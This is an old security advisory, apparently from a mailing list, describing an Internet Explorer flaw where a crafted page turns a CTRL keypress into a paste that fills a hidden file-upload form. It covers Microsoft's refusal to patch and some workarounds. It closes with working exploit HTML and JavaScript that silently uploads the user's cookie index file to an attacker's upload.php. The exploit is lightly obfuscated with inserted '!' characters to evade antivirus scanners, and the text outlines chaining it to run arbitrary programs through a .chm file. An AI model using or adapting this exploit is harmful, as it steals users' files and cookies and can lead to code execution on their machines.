|
Brought to you by:
Suppliers of:
|
|
|
| |
| Pressing CTRL in IE may result in arbitrary local file to be uploaded to a remote server (no exact path needed). If special sensitive information is uploaded, it may be used to run remote programs. |
| |
Credit:
The information has been provided by Andreas Sandblad.
|
| |
A special crafted webpage can retrieve any local file using simple JavaScript. This is possible by performing the following steps:
1. When a user presses the CTRL key an OnKeydown event can be set to fire. In the event function the key pressed is changed to 'V'. The result will be a paste operation with fewer restrictions.
2. The content of the clipboard is altered and focus is changed to a hidden file upload form. The paste operation will be performed into the form, yielding a change of value for the file upload field (not normally allowed).
3. The upload form is submitted automatically (legal JavaScript operation).
It isn't necessary to know the exact path to local files because it's possible to refer to a file with "..\filename".
Further on, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat" is uploaded, then the random directories needed to get the exact path to the temporarily internet folders can be retrieved. Knowing the exact path a compiled help file .chm can be dumped and launched with showHelp() (old .chm attack). The compiled help file is allowed to have instructions to execute arbitrary programs.
Vendor status:
02-06-16
Microsoft was contacted about the issue.
02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not meet the bar of a security vulnerability. We will not be releasing a hotfix or patch for this issue."
They proposed the following possible workarounds:
1. Disable or set to prompt - "Submit non encrypted form data" option
2. Disable "allow paste operations via script" (best)
3. Disable active scripting
Exploit:
Instructions:
Put the html code in a remote html document and load it with Internet Explorer. Activate the exploit by pressing CTRL. You must prepare a server side script to take care of the upload process ("upload.php"). If you choose to use PHP we recommend http://www.php.net/manual/en/features.file-upload.php as a reference on how to setup a server side script taking care of a file upload.
Note:
1. Please remove all "!" characters in the exploit code. They have been inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.
Exploit code:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------
|
|
|
|
|
